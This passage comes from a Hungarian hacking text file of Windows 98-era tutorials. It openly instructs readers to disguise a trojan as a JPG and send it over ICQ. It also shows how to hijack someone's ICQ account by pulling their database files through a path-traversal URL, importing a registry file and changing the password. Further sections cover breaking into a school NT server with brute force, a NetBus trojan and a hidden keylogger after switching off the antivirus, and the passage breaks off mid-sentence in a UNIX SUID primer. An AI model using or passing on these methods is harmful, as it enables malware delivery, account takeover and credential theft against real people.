lehetõségeid határtalanok! Ha ez így bonyolult, akkor itt a tiszta megoldás: A Joiner nevû program segítségével társítod a trójai szervert egy .jpg képpel. Ekkor kapsz egy "Result.exe" nevû progit. Ez az új vírus. Fogod a Microangelo-t , és kicseréled az ikonját egy .jpg ikonra (a jpg ikont a C:\Program Files\Internet E xplorer\iexplore.exe tartalmazza). Ezután átnevezed a .jpg ikonnal rendelkezõ vírust "picture.jpg .exe" névre és kész! Elküldöd a köcsögnek ICQ-n, és õ azt hiszi rá, hogy kép, elindítja, és ráadásul meg is jelenik nála az eredeti kép, amivel társítottad a trojant. :) Ha nem te vagy a legprimitívebb segg, akit valaha láttam, a kkor már rég megértetted az egészet, sõt már unod is. Szóval ennyi az egész, n em egy nagy cucc. -------------------------------------------------------------------------------ICQ exploit - avagy hogyan klónozzunk ICQ-ban: Hogyan lehetséges egy ICQ számot feltörni? Ez elég egyszerû dolog, de sajnos ne m mindig mûködik. A következõket kell tenned: 1. Az ICQ Exploit-ot használó célpont gépérõl töltsd le a következõ fil eokat: (123.123.123.123 = a célpont IP címe) (UIN = a fickó ICQ száma) (Figyelj, hogy hat pont van, nem nyolc!) http://123.123.123.123/.html/....../db/UIN.idx http://123.123.123.123/.html/....../db/UIN.dat http://123.123.123.123/.html/....../db/UINmsg.dat http://123.123.123.123/.html/....../db/UINmsg.idx http://123.123.123.123/.html/....../db/UINhis.idx http://123.123.123.123/.html/....../db/UINhis.dat Amennyiben így nem mûködik, egy trójai programot kell használnod. 2. Nyisd meg a Notepad-et, és csinálj egy új dokumentumot! 3. Másold bele a következõket: (Cseréld ki a "Hacked UIN"-eket a célpont UIN-jével) (Ez a Registry Key a http://i.am/devil cimrõl van) REGEDIT4 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN] "Name"="Hacked UIN" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs] "Random Groups Version"=dword:0000000a "Online Color"=dword:00ff0000 "Unlisted Color"=dword:00800000 "Offline Color"=dword:000000ff "Authorize Color"=dword:00400080 "Notify Color"=dword:00800080 "LastStatus Color"=dword:00008000 "Default File Dir"="C:\\Program Files\\ICQ\\Received Files" "SMTP Address"="" "DND Message"="Please do not disturb me now. Disturb me later." "Out Message"="" "Busy Message"="User is occupied. Only urgent messages will be delivered." "Chat Message"="I would like to chat about anything" "Away PreNum"=dword:00000000 "Out PreNum"=dword:00000000 "Busy PreNum"=dword:00000000 "DND PreNum"=dword:00000000 "Chat PreNum"=dword:00000000 "File Options"=dword:00000004 "URL Options"=dword:00000004 "Chat 10. oldal

win98.TXT Options"=dword:00000004 "All Options"=dword:0000000e "EXT Options"=dword:00000004 "Startup"="No" "Auto Away"="No" "Auto Hide Time"=dword:0000001e "Auto Hide"="No" "Move Server Top"="No" "Blink In Tray"="No" "Sort Lists"="Yes" "Show Online List"="No" "Remove AddFriend"="Yes" "Splash Open"="Yes" "History Last First"="Yes" "FloatTop"="Yes" "Thru Server"="No" "Join Chat"="No" "Open URL Browser"="No" "Refuse File NotInList"="No" "Overwrite ExistFile"="No" "Disable Online Alert"="Yes" "Accept Urgent In Busy"="No" "Blink Tray In AwayBusy"="Yes" "Use Contact List Color"="No" "Contact List Color"=dword:00c8b99d "Save User File"="Yes" "Auto Update"="Yes" "Search Wizard"="No" "Default Mailer"="Yes" "Pop Play Sound"="Yes" "Pop Auto Launch"="No" "Pop Check"="No" "Pop Time"=dword:0000000a "Check Headers"="Yes" "MoveToOutDelay"=dword:00000014 "MoveToOut"="No" "MoveToAwayDelay"=dword:0000000a "MoveToAway"="No" "Auto Sleep Mode"="No" "Log History Events"="Yes" "Connection Type"="Permanent" "Firewall"="Yes" "UseGivenIP"="No" "Socks"="No" "SocksPort"=dword:00000438 "SocksServer"="Enter your socks server" "ProxySocks4Host"="Enter your proxy server" "ProxySocks4Port"=dword:00000438 "UseProxySocks4"="No" "GiveStats"="No" "SocksVersion"=dword:00000004 "SocksAuthentication"=dword:00000000 "FirewallTimeout"=dword:0000001e "UseFirewallTimeout"="No" "UseFirewallRangePorts"="Yes" "FirewallFromPort"=dword:000059d8 "FirewallToPort"=dword:00007148 "Old Sockets"="No" "UserType"=dword:00000000 "Mail Receipients"=";" "Random Available"="No" "RandomGroupName"=dword:00000001 "Random Name"="#Yd3 666 L[" "Allow Secure Clients Only"="Yes" "PhoneApproval"="Yes" "PhoneToneTime"=dword:00000032 "PhonePauseTime"=dword:000001f4 "PhoneBreakTime"=dword:00000028 "PhoneSettings"=dword:00000001 "PhonePauseChar"="," "PhoneLocalP"=" " "PhoneLongP"=" " "PhoneInterP"=" " "Chat RoomName"="Product Support / Suggestion" "Auto Join Chat Room"="Yes" "Novice Counter"=dword:0000000a "Menu Counter"=dword:00000013 "Servers Version"=dword:00000001 "Externals Version"=dword:00000019 "Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\ 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 "Novice"="No" "Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00 "State Flags"=dword:00000000 "Server Msg Version"=dword:0000000b "Server Msg Shown"=dword:00000001 "Server Msg Count"=dword:00000009 "LeftButton Warning"="No" "Menu Left Click"="No" "Tip Startup"="No" "Tip Position"=dword:00000000 "MoreEvents Warning"="No" "Invisible Warning"="No" "Send Later Warning Off"="No" "Busy Warning"="No" "Away Warning"="No" "DND Warning"="No" "FT Warning"="No" "Ext Warning"="No" "Out Warning"="No" "Chat Warning"="No" "Away Message"="User is currently away\r\nYou can leave him/her a message" "Random Co mment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-19 98. No Rights Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth." [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets] "OutMsg Presets 0"="I'm out'a here. See you tomorrow!" "DNDMsg Presets 0"="Please do not disturb me now. Disturb me later." "Away PresetsMsg 0"="Away" "Out PresetsMsg 0"="Out for the day" "Busy PresetsMsg 0"="Busy" "DND PresetsMsg 0"="DND" "Chat PresetsMsg 0"="Chat" "AwayMsg Presets 1"="I am out to lunch. I will return shortly." "OutMsg Presets 1"="" "DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed." "ChatMsg Presets 1"="Come Join my chat room!" "Away PresetsMsg 1"="Lunch" "Out PresetsMsg 1"="Not here" "Busy PresetsMsg 1"="Meeting" "DND PresetsMsg 1"="Meeting" "Chat PresetsMsg 1"="Come In" "AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!" "OutMsg Presets 2"="I'm closed for the weekend/holidays." "DNDMsg Presets 2"="Don't disturb my concentration!" "ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!" "Away PresetsMsg 2"="Be right back" "Out PresetsMsg 2"="Closed" "Busy PresetsMsg 11. oldal

win98.TXT 2"="Concentration" "DND PresetsMsg 2"="Concentration" "Chat PresetsMsg 2"="Fun" "AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished." "OutMsg Presets 3"="Gone fishin'." "DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!" "ChatMsg Presets 3"="What are you waiting for? Come on in!" "Away PresetsMsg 3"="Dog Walk" "Out PresetsMsg 3"="Fishing" "Busy PresetsMsg 3"="On the Phone" "DND PresetsMsg 3"="On the Phone" "Chat PresetsMsg 3"="Don't Wait" "AwayMsg Presets 4"="Went out for a smoke. " "OutMsg Presets 4"="I'm sleeping. Don't wake me." "DNDMsg Presets 4"="I can't chat with you now. I'm busy." "ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat." "Away PresetsMsg 4"="Smoke" "Out PresetsMsg 4"="Sleeping" "Busy PresetsMsg 4"="Can't chat " "DND PresetsMsg 4"="Can't chat " "Chat PresetsMsg 4"="Hear" "AwayMsg Presets 5"="On my Coffee break." "OutMsg Presets 5"="Went home. Had to feed the kids." "DNDMsg Presets 5"="Can't you see I'm working?" "ChatMsg Presets 5"="Enter your chat room message here" "Away PresetsMsg 5"="Coffee" "Out PresetsMsg 5"="Kids" "Busy PresetsMsg 5"="Working" "DND PresetsMsg 5"="Working" "Chat PresetsMsg 5"="Empty" "AwayMsg Presets 6"="Went to get some fresh air." "OutMsg Presets 6"="Gone for good." "DNDMsg Presets 6"="Enter your occupied message here" "ChatMsg Presets 6"="Enter your chat room message here" "Away PresetsMsg 6"="Air" "Out PresetsMsg 6"="Gone" "Busy PresetsMsg 6"="Conversing" "DND PresetsMsg 6"="Empty" "Chat PresetsMsg 6"="Empty" "BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered." "DNDMsg Presets 7"="Enter your occupied message here" "ChatMsg Presets 7"="Enter your chat room message here" "Away PresetsMsg 7"="Empty" "Out PresetsMsg 7"="Empty" "Busy PresetsMsg 7"="Empty" "DND PresetsMsg 7"="Empty" "Chat PresetsMsg 7"="Empty" "BusyMsg Presets 0"="User is currently Occupied" "ChatMsg Presets 0"="I would like to chat about anything" "BusyMsg Presets 1"="User is currently Occupied1" "BusyMsg Presets 2"="User is currently Occupied2" "BusyMsg Presets 3"="User is currently Occupied" "BusyMsg Presets 4"="User is currently Occupied" "BusyMsg Presets 5"="User is currently Occupied" "BusyMsg Presets 6"="User is currently Occupied" "AwayMsg Presets 7"="User is currently away" "OutMsg Presets 7"="User is currently N/A" "AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0] "Message"="Please bookmark our network status page." "URLName"="http://www.mirabilis.com/status.html" "URL"="press here" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1] "URLName"="http://www.mirabilis.com/emailsig.html" "URL"="Go to the ICQ e-mail signature generator" "Date"="" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2] "Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Cr eate your ICQ interest group - home, work, family, hobby, affiliation, sports, music. ..etc..( It's straight forward, no HTML needed! )" "URLName"="http://www.icq.com/announcements/02.html" "URL"="It's fun and easy, GO!!" "Date"="31-MAR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3] "URLName"="http://www.icq.com/announcements/whitepages.html" "URL"="Go!" "Date"="1-APR-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4] "Message"="ICQ can notify you when you receive an e-mail and show you the e-mail head ers! Learn how to do it!" "URLName"="http://www.mirabilis.com/email.html" "URL"="E-mail notification instructions" "Date"="15-JUN-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5] "URLName"="http://www.icq.com/announcements/05.html" "URL"="Create your Greeting" "Date"="12-JUL-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6] "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="26-AUG-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7] "Message"="ICQ can alert you when you receive Emails and show you the Email headers!" "URLName"="http://www.icq.com/announcements/07.html" "URL"="Learn how to do it" "Date"="06-SEPT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8] 12. oldal

win98.TXT "URLName"="http://www.icq.com/announcements/06.html" "URL"="Click For More Information" "Date"="20-OCT-98" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup1] "Name"="General Chat" "Number"=dword:00000001 "Version"=dword:00000001 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup2] "Name"="Romance" "Number"=dword:00000002 "Version"=dword:00000002 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup3] "Name"="Games" "Number"=dword:00000003 "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup4] "Name"="Students" "Number"=dword:00000004 "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup5] "Name"="20 Something" "Number"=dword:00000006 "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup6] "Name"="30 Something" "Number"=dword:00000007 "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup7] "Name"="40 Something" "Number"=dword:00000008 "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\Ra ndomG roup8] "Name"="50 Plus" "Number"=dword:00000009 "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1 ] "Host"="icq1.mirabilis.com" "Port"=dword:00000fa0 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals] [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canas ta] "Type"="Command" "Command Line"="/ip:" "Path"="C:\\Program Files\\Canasta\\Canasta.exe" "URL"="http://ourworld.compuserve.com/homepages/mharte" "Version"=dword:0000000f [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Conne ctix VideoPhone] "Type"="Extension" "Format"="/p:tcp /ac:" "Extension"="cvp" "URL"="http://www.connectix.com/html/videophone.html" "Version"=dword:00000009 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Se eme] "Type"="Command" "Command Line"="" "Path"="C:\\CUSEEME\\CUSEEM32.EXE" "URL"="http://www.cu-seeme.com/" "Version"=dword:00000006 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone ] "Type"="Extension" "Format"="" "Extension"="iru" "URL"="http://irisphone.com/" "Version"=dword:0000000a [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Micro soft VChat] "Type"="ServerExtension" "Format"="1.1\\n-u 1 -a " "Extension"="vce" "NumParameters"=dword:00000002 "Server1"="vchat1.microsoft.com" "URL"="http://vchat1.microsoft.com" "Version"=dword:00000011 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Micro soft VChat\Param1] "ParamName"="World" "CanOtherChange"="No" "Param1"="#Compass" "Param2"="#BugWorld" "Param3"="#Fishbowl" "Param4"="#Lodge" "Param5"="#Lunar" "Param6"="#Lodge" "Param7"="#Practice" "Param8"="#RedDen" "Param9"="#TableTop" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Micro soft VChat\Param2] "ParamName"="Avatar" "CanOtherChange"="Yes" "Param1"="Amani" "Param2"="Anderson" "Param3"="Brb" "Param4"="Cat" "Param5"="Crab" "Param6"="Dancer" "Param7"="Dred" "Param8"="Duggan" "Param9"="Joey" "Param10"="Lulu" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netsc ape C oolTalk] "Type"="Command" "Command Line"="" "Path"="C:\\Program 13. oldal

win98.TXT Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE" "URL"=" http://home.netscape.com/comprod/products/navigator/version_3.0/communication/co oltal k/index.html" "Version"=dword:00000004 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikke n on the Rockx] "Type"="ClientServer" "Client Command Line"="/CLIENT %i" "Server Command Line"="/SERVER" "Client Path"="C:\\Rikken\\Rikken.exe" "Server Path"="C:\\Rikken\\Rikken.exe" "URL"="http://www.dse.nl/~ramon/rikken/" "Version"=dword:00000017 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPh one] "Type"="Extension" "Format"="callto://" "Extension"="vdp" "URL"="http://www.vdo.net/download/" "Version"=dword:00000003 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCa ll] " Type"="Command" "Command Line"="" "Path"="C:\\VidCall\\Corp.EXE" "URL"="http://www.access.digex.net/~vidcall/vidcall.html" "Version"=dword:00000008 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPh one] "Type"="Extension" "Format"="" "Extension"="wpc" "URL"="http://www.webphone.com/" "Version"=dword:00000007 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake ] "Type"="ClientServer" "Client Command Line"="-mpath +connect %i" "Server Command Line"="-mpath -listen" "Client Path"="c:\\quake_sw\\Q95.bat" "Server Path"="c:\\quake_sw\\Q95.bat" "Server1"="quake.xmisson.com" "URL"="http://www.idsoftware.com" "Version"=dword:00000010 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxCh at] "Type"="ServerCommand" "Format"="GROUPNAME=i PORT=15000" "Path"="C:\\Program Files\\VoxChat\\VoxChat.exe" "NumParameters"=dword:00000001 "Server1"="voxchat1.voxware.com" "Server2"="voxcha2.voxware.com" "URL"="http://www.voxchat.com/low/download.htm" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxCh at\Pa ram1] "ParamName"="Room" "CanOtherChange"="No" "Param1"="#ICQ" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations] "LastUpdate"=dword:00000000 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main] "SelectedCell"=dword:00000000 "AlwaysOnTop"="Yes" "LeftBarWidth"=dword:000000ad "RightBarWidth"=dword:000000ad "FloatBar-Left"=dword:00000255 "FloatBar-Right"=dword:00000307 "FloatBar-Top"=dword:00000033 "FloatBar-Bottom"=dword:000001f3 "State"="Floating" "Minimized"="No" [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows] "Response"=dword:008f00c9 "SearchWiz"=dword:006f00c0 "NotifyWiz"=dword:006f00c0 "posNovice"=dword:009300dc "posMOTD"=dword:00af00b7 "posMenuConfig"=dword:00a900e7 "RemoveUIN"=dword:00bb0108 "Message"=dword:008b004f "Security"=dword:007400b4 "Prefs"=dword:007f00ae "History"=dword:0096003a "File Request"=dword:009000f0 "FileTransfer"=dword:009700ae "Info"=dword:009300d2 "FetchUser"=dword:00e9010e "URL Message"=dword:00a00069 "Away"=dword:00bd00f7 "Chat Request"=dword:009f00dd "Contacts List"=dword:008300bd "Chat"=dword:008b00f5 "Phone"=dword:000a000a "Phone Call Request"=dword:007700e5 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search] "Place"=dword:00a400cc "Type"=dword:00000002 "Width"=dword:01880188 [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat] "ChatStyle Counter"=dword:00000003 "Pen Color"=dword:0080ffff "Back Color"=dword:00004000 "Send Focus"="Yes" "Enable Sounds"="Yes" "Name Bars"="Yes" "Always On Top"="No" "AutoColor"="No" "OverRide Format"="Yes" "Show Toolbar"="Yes" "State"=dword:00010000 "New Font Name"="Times New Roman" "Char Set"=dword:00000000 "IRCListWidth"=dword:00000006 "Font Pitch"=dword:00000012 "New Font Height"=dword:0000000e "Font Effects"=dword:00000000 "AutoColor 0"=dword:00000000 "AutoColor 1"=dword:00000080 "AutoColor 2"=dword:00008000 14. oldal

win98.TXT "AutoColor 3"=dword:00008080 "AutoColor 4"=dword:00800000 "AutoColor 5"=dword:00800080 "AutoColor 6"=dword:00808000 "AutoColor 7"=dword:00808080 "AutoColor 8"=dword:00c0c0c0 "AutoColor 9"=dword:000000ff "AutoColor 10"=dword:0000ff00 "AutoColor 11"=dword:0000ffff "AutoColor 12"=dword:00ff0000 "AutoColor 13"=dword:00ff00ff "AutoColor 14"=dword:00ffff00 "AutoColor 15"=dword:00ffffff "Place-Left"=dword:0000000a "Place-Right"=dword:000001fe "Place-Top"=dword:0000000a "Place-Bottom"=dword:0000021a "New LogFile name"="ICQChatLog.txt" "New SaveFile name"="ICQChatSave.txt" 4. Mentsd el a file-t "HACKEDICQ.REG" néven! 5. Ha meg van nyitva ICQ-d, zárd be! 6. A korábban megszerzett fileokat másold bele az ICQ-d DB könyvtárába (C:\Program Fi les\Icq\Db)! 7. Futtasad a HACKEDICQ.REG-et! 8. A kérdésre, miszerint bekerüljön-e a registrybe a tartalma, válaszolj Yes-t! 9. Futtasd az ICQ könyvtáradban lévõ DB konvertáló programot (Dbconvert.exe, a z ICQ99-hez jár), és klikkelj a "Convert an old DB"-re! 10. Mikor kész van, zárd be a konvertert. Ilyenkor automatikusan elindul az ICQ. Ha n em, indítsd el. 11. Ha nem rögtön a feltört UIN-nel indul, akkor válaszd az "Add/Change Current User" -t , aztán "Change Active User". Írd be a feltört UIN-t. Ha ilyenkor kódot kér, akkor két dolog lehetséges: - Magasra van állítva a biztonsági szint, ilyenkor le kell töltened az ICQCRACK-et - A célpont felhasználó használja a számot, ilyenkor meg kell várni, míg lemegy. 12. Miután sikeresen bent vagy az õ UIN-jével, gyorsan változtasd meg a passwo rdjét. Ha ez megvan, azt csinálsz a nevében, amit akarsz. Küldetés végrehajtva. :) -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Windows NT bug: -------------------------------------------------------------------------------Újabb hiba az NT-ben!! Ha egy felhasználó beloginol egy NT-s gépbe, van néhány proces sz, ami automatikusan elindul, mint például az explorer.exe. Ezek a programok normáli s esetben a %winroot% vagy a %winroot%\system32-ben vannak. A probléma az, hogy az NT elõször a felhasználó home könyvtárában, majd a gyökérben keresi ezeket. Ez le hetõseget ad bármelyik felhasználónak, hogy átnevezve futtason egy alkalmazást , átlépve több biztonsági kiírást. A fájlok, amikkel ez a dolog mûködik: explor er.exe, isass.exe, nddeagnt.exe, taskmgr.exe és userinit.exe. Próbáld ki, hogy a comm and.com-ot átnevezed explorer.exe-re, és utána újra beloginolsz... Ha valaki az el&ot ilde;bb leírt NT-s hibát ki akarja javítani a rendszerében, tegye a következõ sort a registrybe: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon\SHELL="C:\winnt\explorer.exe" -------------------------------------------------------------------------------Betörés egy Win NT server-be: Hogyan törjünk be egy server-be? Na igen, a legtöbbek által föltett kérdés. Attól füg g, miért akarunk hozzáférni a server-hez. Ha a server mondjuk a suliban van, és a jel szavára vagyunk kíváncsiak, hogy a tanár/rendszergazda távollétében operálhassunk a g épen, akkor 3 megoldás van. Tehát nézzük ez elsõ esetet. Használjuk a Brutus AET 2 nevû programot, ami rögvest el is kezdi a jelszó megfejtését. Ezzel csak az a gáz, hogy lassan dolgozik, és a nem valószínû, hogy a serveren kívül más g ép is napokig be lesz kapcsolva anélkül, hogy bárki is észrevenné a kis programunkat. A másik megoldás, hogy a mikor hozzájutunk a server-hez, véletlenül ottfelejtünk egy kis ajándékot, méghozzá egy trójai progi server részét. Ezt hálózatról is átmásolhatj uk, csakhogy el is kell indítani, ez viszont már hálózatról nem jó. Tehát a célgépen kell elindítani. Naszóval, ha el van indítva, akkor szurkolhatunk, nehogy kiszúrja a vírusirtó. Ha McA ffee vírusölõ van telepítve, akkor a System Tray-ben, az óra mellett van a Qui ckStart ikonja, itt ki lehet iktatni a System Scan-t. Ezután gond nélkül lefuttathatj uk a trójait, és utána állítsuk vissza a QuickStart-ot. Ez megvan kb. 20 mp alatt, úg yhogy nem kell félni. Mivel a server-nek fix, állandó IP-címe van, elég 1x megnézni. Ha nincs kiírva valaho va a gépre, vagy mellé, akkor a Start Menü => Futtatás mezõbe írd be, hogy: "w inipcfg" (persze 15. oldal

win98.TXT idézõjelek nélkül), és okézd le. Erre kiírja a gép IP-jét. Ez t írd fel valahová. Ha SuliNet-es a gép, akkor valami ilyesmi lesz: 195.199.xx.xx Ezután bárhonnan csatlakozhatunk, de legjobb, ha leülünk a servertõl legtávola bb esõ gépre, és NetBus esetében benyomjuk a Listen-t, és figyeljük a dolgot, meg hogy mikor ül oda a tanár/rendszergazda. Használhatunk még KeyLogger programokat, szerintem ez a legjobb megoldás mert az el&o tilde;zõ 2 elég lamer. Lehetõleg elõtte próbáldjuk ki más gépen, hogy milyen fileba menti a cuccost stb. Ajánlatos olyan Keyloggert választani ami kus sban fut, és nem szúr szemet. Namost. Ha jól vannak a jogok kiosztva a szerveren akko r nem tudunk írni rá, de olvasni tudjuk. Ez nekünk bõven elég, mert megkeressü k a file-t ahová a Keylogger mentette a stuffot, és a file-ból kiolvassuk a dolgokat. Én a SKInt5 nevû billentyûfigyelõ programot ajánlom. Nálunk ez fut a suli serveren. (Hála nekem...) Hát ennyi! -------------------------------------------------------------------------------////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\ -------------------------------------------------------------------------------Alap UNIX hack módszerek teoretikai oldala: -------------------------------------------------------------------------------Hogy még a legkezdõbb kezdõ számára is érthetõ legyen, írtam egy kis bevezetõt a UNIX-ba: -------------------------------------------------------------------------------UNIX: Szóval a UNIX alapja a többfelhasználós stabilitás. Namost... mindenfelhasználónak (u ser) van egy LOGIN neve (login name), egy jelszava (password), egy UID-je /egy GID-je / egy home könyvtára (home directory). A root a rendszer fõnöke: neki mindenhez joga van. Miért? Jó kérdés. Hát azért, mert a UID-je 0. UID = User ID. Ha ez nulla, akkor te egy isten vagy a ren dszerben. De általában a felhasználóké más. Persze a root akárkinek adhat 0 UID-t. Ho gyan? Hát úgy, hogy a /etc/passwd file-ban lecseréli a UID számodat 0 ra. Tehát: A fe lhasználónak nincsenek jogai. A felhasználónak van egy száma (UID). A fileokban és a directory-kban (könyvtárak) van a csoda. A file-nak vannak úgyneveze tt permission-jei. Ez így néz ki: -rwxrwxrwx owner group filename Ebbõl a fontos rész a "-rwxrwxrwx", az "owner" és a "group". Az elsõ "-" karakter az jelzi, hogy FILE. Ha "d" lenne, akkor directory, ha "l ", akkor link stb... Az "r" betû az olvasási engedély, a "w" az írási engedély, az "x" pedig végrehajtási (execute) engedély. Az elsõ három rwx azt jelenti, h ogy ezek a OWNER (vagyis a filetulajdonos) engedélyei. A file ownere azt csinál vele, amit akar. A második a GROUP. Ez egy csoport UID. Van egy csoport, aminek beállíthatod a GID-jét . Tehát ha ez pl. 111-re, és a group neve "hackerek"-re lenne beállítva, akkor ezt a file-t csak azok tudnák olvasni, akik a hackerek groupban vannak. (Na és persze az ow ner, valamint a root.) -rw-r----- <- az owner és a root írni tud bele, és olvashatja, a groupban lévõ emberek csak olvasni tudják... A harmadik mezõt úgy hívják: NOBODY. Vagyis "senki": azaz bárki csinálhat vele mindent, ami a 3. mezõben meg van engedve. Vagyis ha pl. az /etc/passwd permission-jei: -rw-rw-r-- <- akkor nincs gond. De általában a system file-oknak az ownerja a root, és a groupja is. Így ha -rw-rw---- <- akkor baj van... Ilyenkor muszaj UID 0-t, vagy GID 0-t szereznünk! Itt jön a dolog szépsége: Ha a file-nak az ownerje pl. a root, és a root engedélyeinél az x helyett egy "s" bet ût látsz, akkor az a program SUID ROOT. A SUID azt jelenti, SET UID. És a root: tehát SET ROOT UID. Vagyis a file (program) executálásnál felveszi az owner UID-jet. Vagyis ha az owner a root, akkor UID 0-val fog futni. Például hogyha... Tegyük fel, hogy ennek a filenak az ownere a root: -rwsr-xr-x <- ez azt jelenti, hogy ha jól megnézed, lefuttathatja a NOBODY. Szóval, h a lefuttatja, akkor a programnak root UID-je lesz! Vagyis ha te a file-ba bele tudnál keríteni egy "cat 